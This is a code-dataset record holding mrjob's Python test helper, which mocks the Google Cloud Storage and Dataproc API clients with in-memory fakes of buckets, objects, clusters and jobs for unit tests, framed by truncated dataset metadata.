pytest.approx(i[1])\n\n", "sub_path": "tests/test_expectation.py", "file_name": 
"test_expectation.py", "file_ext": "py", "file_size_in_byte": 2103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "splink.params.Params", "line_number": 15, "usage_type": "call"}, {"api_name": "splink.expectation_step._sql_gen_gamma_prob_columns", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.util.testing.assert_frame_equal", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 50, "usage_type": "call"}, {"api_name": "splink.expectation_step._sql_gen_expected_match_prob", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 54, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "618907588", "text": "# Copyright 2009-2016 Yelp and Contributors\n# Copyright 2017 Yelp\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport re\nimport collections\nimport copy\nimport time\nimport hashlib\nimport sys\nfrom datetime import datetime\nfrom httplib2 import Response\nfrom io import BytesIO\nfrom unittest import skipIf\n\ntry:\n from oauth2client.client import GoogleCredentials\n from googleapiclient import discovery\n from googleapiclient import errors as google_errors\n from googleapiclient import http as google_http\nexcept ImportError:\n # don't require googleapiclient; MRJobs don't actually need it when running\n # inside hadoop streaming\n GoogleCredentials = None\n discovery = None\n google_errors = None\n google_http = None\n\nfrom mrjob.dataproc import DataprocJobRunner\nfrom mrjob.dataproc import _DATAPROC_API_REGION\nfrom mrjob.fs.gcs import GCSFilesystem\nfrom mrjob.fs.gcs import parse_gcs_uri\nfrom mrjob.fs.gcs import _hex_to_base64\nfrom mrjob.fs.gcs import _LS_FIELDS_TO_RETURN\n\nfrom tests.mr_two_step_job import MRTwoStepJob\nfrom tests.py2 import patch\nfrom tests.py2 import mock\nfrom tests.sandbox import SandboxedTestCase\n\n# list_clusters() only returns this many results at a time\nDEFAULT_MAX_CLUSTERS_RETURNED = 50\n_TEST_PROJECT = 'test-mrjob:test-project'\n\n_GCLOUD_CONFIG = {\n 'compute.region': 'us-central1',\n 'compute.zone': 'us-central1-b',\n 'core.account': 'no@where.com',\n 'core.disable_usage_reporting': 'False',\n 'core.project': _TEST_PROJECT\n}\n\n\ndef mock_api(fxn):\n def req_wrapper(*args, **kwargs):\n actual_resp = fxn(*args, **kwargs)\n\n mocked_req = mock.MagicMock(google_http.HttpRequest)\n mocked_req.execute.return_value = actual_resp\n\n return mocked_req\n\n return req_wrapper\n\n\ndef mock_google_error(status):\n mock_resp = mock.Mock(spec=Response)\n mock_resp.status = status\n return google_errors.HttpError(mock_resp, b'')\n\n\n# Addressable data structure specific\ndef _get_deep(data_structure, dot_path_or_list, default_value=None):\n \"\"\"Attempts access nested data structures and not 
blow up on a gross key\n    error\n\n    {\n        \"hello\": {\n            \"hi\": 5\n        }\n    }\n    \"\"\"\n    search_path = None\n\n    param_type = type(dot_path_or_list)\n    if param_type in (tuple, list):\n        search_path = dot_path_or_list\n    elif param_type == str:\n        search_path = dot_path_or_list.split('.')\n\n    assert len(search_path) > 0, \"Missing valid search path\"\n\n    try:\n        current_item = data_structure\n        for search_key in search_path:\n            current_item = current_item[search_key]\n    except (KeyError, IndexError, TypeError):\n        return default_value\n\n    return current_item\n\n\ndef _set_deep(data_structure, dot_path_or_list, value_to_set):\n    \"\"\"Attempts to access nested data structures and not blow up on a gross key\n    error.\n\n    {\n        \"hello\": {\n            \"hi\": 5\n        }\n    }\n    \"\"\"\n    assert hasattr(data_structure, '__setitem__')\n    search_path = None\n\n    param_type = type(dot_path_or_list)\n    if param_type in (tuple, list):\n        search_path = dot_path_or_list\n    elif param_type == str:\n        search_path = dot_path_or_list.split('.')\n\n    assert len(search_path) > 0, \"Missing valid search path\"\n\n    current_item = data_structure\n    for search_key in search_path[:-1]:\n        current_item.setdefault(search_key, dict())\n        current_item = current_item[search_key]\n\n    current_item[search_path[-1]] = value_to_set\n    return data_structure\n\n\ndef _dict_deep_update(d, u):\n    \"\"\"from http://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth \"\"\" # noqa\n    for k, v in u.items():\n        if isinstance(v, collections.Mapping):\n            r = _dict_deep_update(d.get(k, {}), v)\n            d[k] = r\n        else:\n            d[k] = u[k]\n    return d\n\n\n### Test Case ###\n\n# disable these tests until we figure out a way to get the google API client\n# to play well with PyPy 3 (which reports itself as Python 3.2, but has key\n# Python 3.3 features)\n@skipIf(\n    hasattr(sys, 'pypy_version_info') and (3, 0) <= sys.version_info < (3, 3),\n    \"googleapiclient doesn't work with PyPy 3\")\nclass MockGoogleAPITestCase(SandboxedTestCase):\n\n    def setUp(self):\n        self._dataproc_client = MockDataprocClient(self)\n        self._gcs_client = MockGCSClient(self)\n        self._gcs_fs = self._gcs_client._fs\n\n        self.start(patch.object(\n            DataprocJobRunner, 'api_client', self._dataproc_client))\n\n        self.gcs_patch_api_client = patch.object(\n            GCSFilesystem, 'api_client', self._gcs_client)\n        self.gcs_patch_download_io = patch.object(\n            GCSFilesystem, '_download_io', self._gcs_client.download_io)\n        self.gcs_patch_upload_io = patch.object(\n            GCSFilesystem, '_upload_io', self._gcs_client.upload_io)\n        self.start(self.gcs_patch_api_client)\n        self.start(self.gcs_patch_download_io)\n        self.start(self.gcs_patch_upload_io)\n\n        self.start(patch('mrjob.dataproc._read_gcloud_config',\n                         lambda: _GCLOUD_CONFIG))\n\n        super(MockGoogleAPITestCase, self).setUp()\n\n        # patch slow things\n        self.mrjob_zip_path = None\n\n        def fake_create_mrjob_zip(runner, *args, **kwargs):\n            if not self.mrjob_zip_path:\n                self.mrjob_zip_path = self.makefile('fake_mrjob.zip')\n\n            runner._mrjob_zip_path = self.mrjob_zip_path\n            return self.mrjob_zip_path\n\n        self.start(patch.object(\n            DataprocJobRunner, '_create_mrjob_zip',\n            fake_create_mrjob_zip))\n\n        self.start(patch.object(time, 'sleep'))\n\n    def make_runner(self, *args):\n        \"\"\"create a dummy job, and call make_runner() on it.\n        Use this in a with block:\n\n        with self.make_runner() as runner:\n            ...\n        \"\"\"\n        stdin = BytesIO(b'foo\\nbar\\n')\n        mr_job = MRTwoStepJob(['-r', 'dataproc'] + list(args))\n        mr_job.sandbox(stdin=stdin)\n\n        return mr_job.make_runner()\n\n    def 
put_gcs_multi(self, gcs_uri_to_data_map):\n \"\"\"Convenience method\"\"\"\n self._gcs_client.put_gcs_multi(gcs_uri_to_data_map)\n\n def put_job_output_parts(self, dataproc_runner, raw_parts):\n assert type(raw_parts) is list\n\n base_uri = dataproc_runner.get_output_dir()\n gcs_multi_dict = dict()\n for part_num, part_data in enumerate(raw_parts):\n gcs_uri = base_uri + 'part-%05d' % part_num\n gcs_multi_dict[gcs_uri] = part_data\n\n self.put_gcs_multi(gcs_multi_dict)\n\n def get_cluster_from_runner(self, runner, cluster_id):\n cluster = runner.api_client.clusters().get(\n projectId=_TEST_PROJECT,\n region=_DATAPROC_API_REGION,\n clusterName=cluster_id,\n ).execute()\n return cluster\n\n############################# BEGIN BEGIN BEGIN ###############################\n########################### GCS Client - OVERALL ##############################\n############################# BEGIN BEGIN BEGIN ###############################\n\n\nclass MockGCSClient(object):\n \"\"\"Mock out GCSClient...\n\n TARGET API VERSION - Storage API v1\n\n Emulates GCS metadata and stores raw bytes\n Contains convenience functions for initializing items in GCS\n \"\"\"\n\n def __init__(self, test_case):\n assert isinstance(test_case, MockGoogleAPITestCase)\n self._test_case = test_case\n self._fs = GCSFilesystem()\n\n self._cache_objects = dict()\n self._cache_buckets = dict()\n\n self._client_objects = MockGCSClientObjects(self)\n self._client_buckets = MockGCSClientBuckets(self)\n\n def objects(self):\n return self._client_objects\n\n def buckets(self):\n return self._client_buckets\n\n def put_gcs(self, gcs_uri, data):\n \"\"\"Put data at gcs_uri, creating a bucket if necessary\"\"\"\n bucket, name = parse_gcs_uri(gcs_uri)\n\n try:\n self._fs.get_bucket(bucket)\n except google_errors.HttpError:\n self._fs.create_bucket(project=_TEST_PROJECT, name=bucket)\n\n bytes_io_obj = BytesIO(data)\n self.upload_io(bytes_io_obj, gcs_uri)\n\n def put_gcs_multi(self, gcs_uri_to_data_map):\n \"\"\"Bulk put data at gcs_uris\"\"\"\n for gcs_uri, data in gcs_uri_to_data_map.items():\n self.put_gcs(gcs_uri, data)\n\n def download_io(self, src_uri, io_obj):\n \"\"\"\n Clobber GCSFilesystem._download_io\n \"\"\"\n bucket, name = parse_gcs_uri(src_uri)\n\n object_dict = _get_deep(self._cache_objects, [bucket, name])\n\n if not object_dict:\n raise Exception\n\n object_data = object_dict['_data']\n io_obj.write(object_data)\n return io_obj\n\n def upload_io(self, io_obj, dest_uri):\n \"\"\"\n Clobber GCSFilesystem._upload_io\n \"\"\"\n bucket, name = parse_gcs_uri(dest_uri)\n\n assert bucket in self._cache_buckets\n\n io_obj.seek(0)\n\n data = io_obj.read()\n\n # TODO - io_obj.close() ? 
Not sure if callers of this function would\n # expect their io_objs to be closed\n\n object_resp = _insert_object_resp(bucket=bucket, name=name, data=data)\n\n _set_deep(self._cache_objects, [bucket, name], object_resp)\n\n return object_resp\n\n\nclass MockGCSClientObjects(object):\n def __init__(self, client):\n assert isinstance(client, MockGCSClient)\n self._client = client\n self._objects = self._client._cache_objects\n\n @mock_api\n def list(self, **kwargs):\n \"\"\"Emulate objects().list - fields supported - bucket, prefix, fields\n \"\"\"\n bucket = kwargs.get('bucket')\n prefix = kwargs.get('prefix') or ''\n fields = kwargs.get('fields') or _LS_FIELDS_TO_RETURN\n assert bucket is not None\n\n # Return only the fields that were requested\n field_match = re.findall('items\\((.*?)\\)', fields)[0]\n actual_fields = set(field_match.split(','))\n\n object_map = _get_deep(self._objects, [bucket], dict())\n\n item_list = []\n for object_name, current_object in object_map.items():\n # Filter out on prefix match\n if not object_name.startswith(prefix):\n continue\n\n # Copy output fields for the requestor\n output_item = dict()\n for current_field in actual_fields:\n output_item[current_field] = current_object[current_field]\n\n item_list.append(output_item)\n\n return dict(items=item_list, kwargs=kwargs)\n\n def list_next(self, list_request, resp):\n \"\"\"list always returns all results in a single shot\"\"\"\n return None\n\n @mock_api\n def delete(self, bucket=None, object=None):\n bucket_dict = self._objects[bucket]\n del bucket_dict[object]\n\n @mock_api\n def get_media(self, bucket=None, object=None):\n raise NotImplementedError('See MockGCSClient.download_io')\n\n @mock_api\n def insert(self, bucket=None, name=None, media_body=None):\n raise NotImplementedError('See MockGCSClient.upload_io')\n\n\nclass MockGCSClientBuckets(object):\n def __init__(self, client):\n assert isinstance(client, MockGCSClient)\n self._client = client\n self._buckets = self._client._cache_buckets\n\n @mock_api\n def list(self, **kwargs):\n \"\"\"Emulate buckets().list - fields supported - project, prefix\"\"\"\n project = kwargs.get('project')\n prefix = kwargs.get('prefix') or ''\n\n item_list = []\n for bucket_name, current_bucket in self._buckets.items():\n if not bucket_name.startswith(prefix):\n continue\n\n if project and project != current_bucket['_projectName']:\n continue\n\n item_list.append(current_bucket)\n\n return dict(items=item_list, kwargs=kwargs)\n\n @mock_api\n def get(self, bucket=None):\n try:\n return self._buckets[bucket]\n except KeyError:\n raise mock_google_error(404)\n\n @mock_api\n def delete(self, bucket=None):\n del self._buckets[bucket]\n\n @mock_api\n def insert(self, project=None, body=None):\n assert project is not None\n body = body or dict()\n\n bucket_name = body['name']\n assert bucket_name not in self._buckets\n\n # Create an empty cluster\n bucket = _make_bucket_resp(project=project)\n\n # Then do a deep-update as to what was requested\n bucket = _dict_deep_update(bucket, body)\n\n self._buckets[bucket_name] = bucket\n\n return bucket\n\n\ndef _insert_object_resp(bucket=None, name=None, data=None):\n \"\"\"Fake GCS object metadata\"\"\"\n assert type(data) is bytes\n\n hasher = hashlib.md5()\n hasher.update(data)\n md5_hex_hash = hasher.hexdigest()\n\n return {\n u'bucket': bucket,\n u'name': name,\n u'md5Hash': _hex_to_base64(md5_hex_hash),\n u'timeCreated': _datetime_to_gcptime(),\n u'size': str(len(data)),\n u'_data': data\n }\n\n\ndef 
_make_bucket_resp(project=None, now=None):\n \"\"\"Fake GCS bucket metadata\"\"\"\n now_time = _datetime_to_gcptime(now)\n\n return {\n u'etag': u'CAE=',\n u'kind': u'storage#bucket',\n u'location': u'US',\n u'metageneration': u'1',\n u'owner': {u'entity': u'project-owners-1234567890'},\n u'projectNumber': u'1234567890',\n u'storageClass': u'STANDARD',\n u'timeCreated': now_time,\n u'updated': now_time,\n u'_projectName': project\n }\n\n############################# END END END ###############################\n########################### GCS Client - OVERALL ##############################\n############################# END END END ###############################\n\n\n############################# BEGIN BEGIN BEGIN ###############################\n######################### Dataproc Client - OVERALL ###########################\n############################# BEGIN BEGIN BEGIN ###############################\nclass MockDataprocClient(object):\n \"\"\"Mock out DataprocJobRunner.api_client...\n\n TARGET API VERSION - Dataproc API v1\n\n Emulates Dataproc cluster / job metadata\n Convenience functions for cluster/job state and updating\n \"\"\"\n\n def __init__(self, test_case):\n assert isinstance(test_case, MockGoogleAPITestCase)\n self._test_case = test_case\n\n self._cache_clusters = {}\n self._cache_jobs = {}\n\n self._client_clusters = MockDataprocClientClusters(self)\n self._client_jobs = MockDataprocClientJobs(self)\n\n # By default - we always resolve our infinite loops by default to\n # state RUNNING / DONE\n self.cluster_get_advances_states = collections.deque(['RUNNING'])\n self.job_get_advances_states = collections.deque(\n ['SETUP_DONE', 'RUNNING', 'DONE'])\n\n def clusters(self):\n return self._client_clusters\n\n def jobs(self):\n return self._client_jobs\n\n def cluster_create(self, project=None, cluster=None):\n cluster_body = _create_cluster_resp(project=project, cluster=cluster)\n cluster_resp = self._client_clusters.create(\n projectId=cluster_body['projectId'],\n region=_DATAPROC_API_REGION,\n body=cluster_body).execute()\n return cluster_resp\n\n def get_state(self, cluster_or_job):\n return cluster_or_job['status']['state']\n\n def update_state(self, cluster_or_job, state=None, prev_state=None):\n old_state = cluster_or_job['status']['state']\n if prev_state:\n assert old_state == prev_state\n\n if old_state == state:\n return cluster_or_job\n\n new_status = {\n \"state\": state,\n \"stateStartTime\": _datetime_to_gcptime()\n }\n\n old_status = cluster_or_job.pop('status')\n cluster_or_job['status'] = new_status\n\n cluster_or_job.setdefault('statusHistory', [])\n cluster_or_job['statusHistory'].append(old_status)\n\n return cluster_or_job\n############################# END END END ###############################\n######################### Dataproc Client - OVERALL ###########################\n############################# END END END ###############################\n\n\n############################# BEGIN BEGIN BEGIN ###############################\n######################### Dataproc Client - Clusters ##########################\n############################# BEGIN BEGIN BEGIN ###############################\n\n_DATAPROC_CLUSTER = 'test-cluster-test'\n_CLUSTER_REGION = _DATAPROC_API_REGION\n_CLUSTER_ZONE = None\n_CLUSTER_IMAGE_VERSION = '1.0'\n_CLUSTER_STATE = ''\n_CLUSTER_MACHINE_TYPE = 'n1-standard-1'\n_CLUSTER_NUM_CORE_INSTANCESS = 2\n\n\ndef _datetime_to_gcptime(in_datetime=None):\n in_datetime = in_datetime or datetime.utcnow()\n return in_datetime.isoformat() + 
'Z'\n\n\ndef _create_cluster_resp(\n project=None, zone=None, cluster=None, image_version=None,\n machine_type=None, machine_type_master=None, num_core_instancess=None,\n now=None):\n \"\"\"Fake Dataproc Cluster metadata\"\"\"\n project = project or _TEST_PROJECT\n zone = zone or _CLUSTER_ZONE\n cluster = cluster or _DATAPROC_CLUSTER\n image_version = image_version or _CLUSTER_IMAGE_VERSION\n machine_type_master = machine_type_master or _CLUSTER_MACHINE_TYPE\n machine_type = machine_type or _CLUSTER_MACHINE_TYPE\n num_core_instancess = num_core_instancess or _CLUSTER_NUM_CORE_INSTANCESS\n\n gce_cluster_conf = {\n \"zoneUri\": (\n \"https://www.googleapis.com/compute/v1/projects/%(project)s/\"\n \"zones/%(zone)s\" % locals()),\n \"networkUri\": (\n \"https://www.googleapis.com/compute/v1/projects/%(project)s/\"\n \"global/networks/default\" % locals()),\n \"serviceAccountScopes\": [\n \"https://www.googleapis.com/auth/bigquery\",\n \"https://www.googleapis.com/auth/bigtable.admin.table\",\n \"https://www.googleapis.com/auth/bigtable.data\",\n \"https://www.googleapis.com/auth/cloud.useraccounts.readonly\",\n \"https://www.googleapis.com/auth/devstorage.full_control\",\n \"https://www.googleapis.com/auth/devstorage.read_write\",\n \"https://www.googleapis.com/auth/logging.write\"\n ],\n }\n\n master_conf = {\n \"numInstances\": 1,\n \"instanceNames\": [\n \"%(cluster)s-m\" % locals()\n ],\n \"imageUri\": (\n \"https://www.googleapis.com/compute/v1/projects/cloud-dataproc/\"\n \"global/images/dataproc-1-0-20160302-200123\"),\n \"machineTypeUri\": (\n \"https://www.googleapis.com/compute/v1/projects/%(project)s/\"\n \"zones/%(zone)s/machineTypes/%(machine_type_master)s\" % locals()),\n \"diskConfig\": {\n \"bootDiskSizeGb\": 500\n },\n }\n\n worker_conf = {\n \"numInstances\": num_core_instancess,\n \"instanceNames\": [\n '%s-w-%d' % (cluster, num) for num in range(num_core_instancess)],\n \"imageUri\": (\n \"https://www.googleapis.com/compute/v1/projects/cloud-dataproc/\"\n \"global/images/dataproc-1-0-20160302-200123\"),\n \"machineTypeUri\": (\n \"https://www.googleapis.com/compute/v1/projects/%(project)s/\"\n \"zones/%(zone)s/machineTypes/%(machine_type)s\" % locals()),\n \"diskConfig\": {\n \"bootDiskSizeGb\": 500\n }\n }\n\n software_conf = {\n \"imageVersion\": image_version,\n \"properties\": {\n \"yarn:yarn.nodemanager.resource.memory-mb\": \"3072\",\n \"yarn:yarn.scheduler.minimum-allocation-mb\": \"256\",\n \"yarn:yarn.scheduler.maximum-allocation-mb\": \"3072\",\n \"mapred:mapreduce.map.memory.mb\": \"3072\",\n \"mapred:mapreduce.map.java.opts\": \"-Xmx2457m\",\n \"mapred:mapreduce.map.cpu.vcores\": \"1\",\n \"mapred:mapreduce.reduce.memory.mb\": \"3072\",\n \"mapred:mapreduce.reduce.java.opts\": \"-Xmx2457m\",\n \"mapred:mapreduce.reduce.cpu.vcores\": \"1\",\n \"mapred:yarn.app.mapreduce.am.resource.mb\": \"3072\",\n \"mapred:yarn.app.mapreduce.am.command-opts\": \"-Xmx2457m\",\n \"mapred:yarn.app.mapreduce.am.resource.cpu-vcores\": \"1\",\n \"distcp:mapreduce.map.memory.mb\": \"3072\",\n \"distcp:mapreduce.reduce.memory.mb\": \"3072\",\n \"distcp:mapreduce.map.java.opts\": \"-Xmx2457m\",\n \"distcp:mapreduce.reduce.java.opts\": \"-Xmx2457m\",\n \"spark:spark.executor.cores\": \"1\",\n \"spark:spark.executor.memory\": \"1152m\",\n \"spark:spark.yarn.executor.memoryOverhead\": \"384\",\n \"spark:spark.yarn.am.memory\": \"1152m\",\n \"spark:spark.yarn.am.memoryOverhead\": \"384\",\n \"spark:spark.driver.memory\": \"960m\",\n \"spark:spark.driver.maxResultSize\": \"480m\"\n }\n }\n\n 
mock_response = {\n \"projectId\": project,\n \"clusterName\": cluster,\n \"config\": {\n \"configBucket\": \"dataproc-801485be-0997-40e7-84a7-00926031747c-us\",\n \"gceClusterConfig\": gce_cluster_conf,\n \"masterConfig\": master_conf,\n \"workerConfig\": worker_conf,\n \"softwareConfig\": software_conf\n },\n \"status\": {\n \"state\": \"CREATING\",\n \"stateStartTime\": _datetime_to_gcptime(now)\n },\n \"clusterUuid\": \"adb4dc59-d109-4af9-badb-0d8e17e028e1\"\n }\n return mock_response\n\n\nclass MockDataprocClientClusters(object):\n def __init__(self, client):\n assert isinstance(client, MockDataprocClient)\n self._client = client\n self._clusters = self._client._cache_clusters\n\n @mock_api\n def create(self, projectId=None, region=None, body=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n body = body or dict()\n\n cluster_name = body['clusterName']\n\n existing_cluster = _get_deep(self._clusters, [projectId, cluster_name])\n assert not existing_cluster\n\n # Create an empty cluster\n cluster = _create_cluster_resp()\n\n # Then do a deep-update as to what was requested\n cluster = _dict_deep_update(cluster, body)\n\n # Create a local copy of advances states\n cluster['_get_advances_states'] = copy.copy(\n self._client.cluster_get_advances_states)\n\n _set_deep(self._clusters, [projectId, cluster_name], cluster)\n\n return cluster\n\n @mock_api\n def get(self, projectId=None, region=None, clusterName=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n cluster = _get_deep(self._clusters, [projectId, clusterName])\n if not cluster:\n raise mock_google_error(404)\n\n # NOTE - TESTING ONLY - Side effect is to advance the state\n advances_states = cluster['_get_advances_states']\n if advances_states:\n next_state = advances_states.popleft()\n self._client.update_state(cluster, state=next_state)\n\n return cluster\n\n @mock_api\n def delete(self, projectId=None, region=None, clusterName=None):\n cluster = self.get(\n projectId=projectId,\n region=region,\n clusterName=clusterName,\n ).execute()\n\n return self._client.update_state(cluster, state='DELETING')\n\n############################# END END END ###############################\n######################### Dataproc Client - Clusters ##########################\n############################# END END END ###############################\n\n\n############################# BEGIN BEGIN BEGIN ###############################\n########################### Dataproc Client - Jobs ############################\n############################# BEGIN BEGIN BEGIN ###############################\n\n_JOB_STATE_MATCHER_ACTIVE = frozenset(['PENDING', 'RUNNING', 'CANCEL_PENDING'])\n_JOB_STATE_MATCHER_NON_ACTIVE = frozenset(['CANCELLED', 'DONE', 'ERROR'])\n_JOB_STATE_MATCHERS = {\n 'ALL': _JOB_STATE_MATCHER_ACTIVE | _JOB_STATE_MATCHER_NON_ACTIVE,\n 'ACTIVE': _JOB_STATE_MATCHER_ACTIVE,\n 'NON_ACTIVE': _JOB_STATE_MATCHER_NON_ACTIVE\n}\n\n_SCRIPT_NAME = 'mr_test_mockgoogleapiclient'\n_USER_NAME = 'testuser'\n_INPUT_DIR = ''\n_OUTPUT_DIR = ''\n\n\ndef _submit_hadoop_job_resp(\n project=None, cluster=None, script_name=None, now=None):\n \"\"\"Fake Dataproc Job metadata\"\"\"\n project = project or _TEST_PROJECT\n cluster = cluster or _DATAPROC_CLUSTER\n script_name = script_name or _SCRIPT_NAME\n now = now or datetime.utcnow()\n\n job_elements = [\n script_name, _USER_NAME, now.strftime('%Y%m%d'),\n now.strftime('%H%M%S'), now.strftime('%f')]\n\n job_id = '-'.join(job_elements + ['-', 'Step', '1', 'of', 
'1'])\n dir_name = '.'.join(job_elements)\n\n mock_response = {\n \"reference\": {\n \"projectId\": project,\n \"jobId\": job_id\n },\n \"placement\": {\n \"clusterName\": cluster,\n \"clusterUuid\": \"8b76d95e-ebdc-4b81-896d-b2c5009b3560\"\n },\n \"hadoopJob\": {\n \"mainJarFileUri\": (\n \"file:///usr/lib/hadoop-mapreduce/hadoop-streaming.jar\"),\n \"args\": [],\n \"loggingConfig\": {}\n },\n \"status\": {\n \"state\": \"PENDING\",\n \"stateStartTime\": _datetime_to_gcptime(now)\n },\n \"driverControlFilesUri\": (\n \"gs://dataproc-801485be-0997-40e7-84a7-00926031747c-us/\"\n \"google-cloud-dataproc-metainfo/\"\n \"8b76d95e-ebdc-4b81-896d-b2c5009b3560/jobs/%(job_id)s/\" % locals()\n ),\n \"driverOutputResourceUri\": (\n \"gs://dataproc-801485be-0997-40e7-84a7-00926031747c-us/\"\n \"google-cloud-dataproc-metainfo/\"\n \"8b76d95e-ebdc-4b81-896d-b2c5009b3560/jobs/%(job_id)s/\"\n \"driveroutput\" % locals()\n ),\n }\n return mock_response\n\n\nclass MockDataprocClientJobs(object):\n def __init__(self, client):\n assert isinstance(client, MockDataprocClient)\n self._client = client\n self._jobs = self._client._cache_jobs\n\n @mock_api\n def list(self, **kwargs):\n \"\"\"Emulate jobs().list -\n fields supported - projectId, region, clusterName, jobStateMatcher\n \"\"\"\n project_id = kwargs['projectId']\n region = kwargs['region']\n cluster_name = kwargs.get('clusterName')\n job_state_matcher = kwargs.get('jobStateMatcher') or 'ALL'\n\n assert project_id is not None\n assert region == _DATAPROC_API_REGION\n\n valid_job_states = _JOB_STATE_MATCHERS[job_state_matcher]\n\n item_list = []\n\n job_map = _get_deep(self._jobs, [project_id], dict())\n\n # Sort all jobs by latest status update time\n jobs_sorted_by_time = sorted(\n job_map.values(), key=lambda j: j['status']['stateStartTime'])\n for current_job in jobs_sorted_by_time:\n job_cluster = current_job['placement']['clusterName']\n job_state = current_job['status']['state']\n\n # Filter out non-matching clusters and job-states\n if cluster_name and job_cluster != cluster_name:\n continue\n elif job_state not in valid_job_states:\n continue\n\n item_list.append(current_job)\n\n return dict(items=item_list, kwargs=kwargs)\n\n def list_next(self, list_request, resp):\n return None\n\n @mock_api\n def get(self, projectId=None, region=None, jobId=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n current_job = _get_deep(self._jobs, [projectId, jobId])\n if not current_job:\n raise mock_google_error(404)\n\n # NOTE - TESTING ONLY - Side effect is to advance the state\n advances_states = current_job['_get_advances_states']\n if advances_states:\n next_state = advances_states.popleft()\n self._client.update_state(current_job, state=next_state)\n\n return current_job\n\n @mock_api\n def cancel(self, projectId=None, region=None, jobId=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n job = self.get(\n projectId=projectId, region=_DATAPROC_API_REGION, jobId=jobId)\n return self._client.update_state(job, state='CANCEL_PENDING')\n\n @mock_api\n def delete(self, projectId=None, region=None, jobId=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n job = self.get(\n projectId=projectId, region=_DATAPROC_API_REGION, jobId=jobId)\n return self._client.update_state(job, state='DELETING')\n\n @mock_api\n def submit(self, projectId=None, region=None, body=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n body = body or dict()\n\n # Create 
an empty job\n job = _submit_hadoop_job_resp()\n\n body_job = body.get('job') or dict()\n\n # Then do a deep-update as to what was requested\n _dict_deep_update(job, body_job)\n\n # Create a local copy of advances states\n job['_get_advances_states'] = copy.copy(\n self._client.job_get_advances_states)\n\n _set_deep(self._jobs, [projectId, job['reference']['jobId']], job)\n\n return job\n\n############################# END END END ###############################\n########################### Dataproc Client - Jobs ############################\n############################# END END END ###############################\n", "sub_path": "tests/mockgoogleapiclient.py", "file_name": "mockgoogleapiclient.py", "file_ext": "py", "file_size_in_byte": 30120, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "oauth2client.client.GoogleCredentials", "line_number": 34, "usage_type": "name"}, {"api_name": "googleapiclient.discovery", "line_number": 35, "usage_type": "name"}, {"api_name": "googleapiclient.errors", "line_number": 36, "usage_type": "name"}, {"api_name": "googleapiclient.http", "line_number": 37, "usage_type": "name"}, {"api_name": "tests.py2.mock.MagicMock", "line_number": 68, "usage_type": "call"}, {"api_name": "tests.py2.mock", "line_number": 68, "usage_type": "name"}, {"api_name": "googleapiclient.http.HttpRequest", "line_number": 68, "usage_type": "attribute"}, {"api_name": "googleapiclient.http", "line_number": 68, "usage_type": "name"}, {"api_name": "tests.py2.mock.Mock", "line_number": 77, "usage_type": "call"}, {"api_name": "tests.py2.mock", "line_number": 77, "usage_type": "name"}, {"api_name": "httplib2.Response", "line_number": 77, "usage_type": "name"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 79, "usage_type": "call"}, {"api_name": "googleapiclient.errors", "line_number": 79, "usage_type": "name"}, {"api_name": "collections.Mapping", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tests.sandbox.SandboxedTestCase", "line_number": 162, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 169, "usage_type": "call"}, {"api_name": "mrjob.dataproc.DataprocJobRunner", "line_number": 170, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 169, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 172, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.GCSFilesystem", "line_number": 173, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 172, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 174, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.GCSFilesystem", "line_number": 175, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 174, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 176, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.GCSFilesystem", "line_number": 177, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 176, "usage_type": "name"}, {"api_name": "tests.py2.patch", "line_number": 182, "usage_type": "call"}, {"api_name": "tests.py2.patch.object", "line_number": 197, "usage_type": "call"}, {"api_name": "mrjob.dataproc.DataprocJobRunner", "line_number": 198, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 197, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 201, "usage_type": "call"}, {"api_name": "tests.py2.patch", 
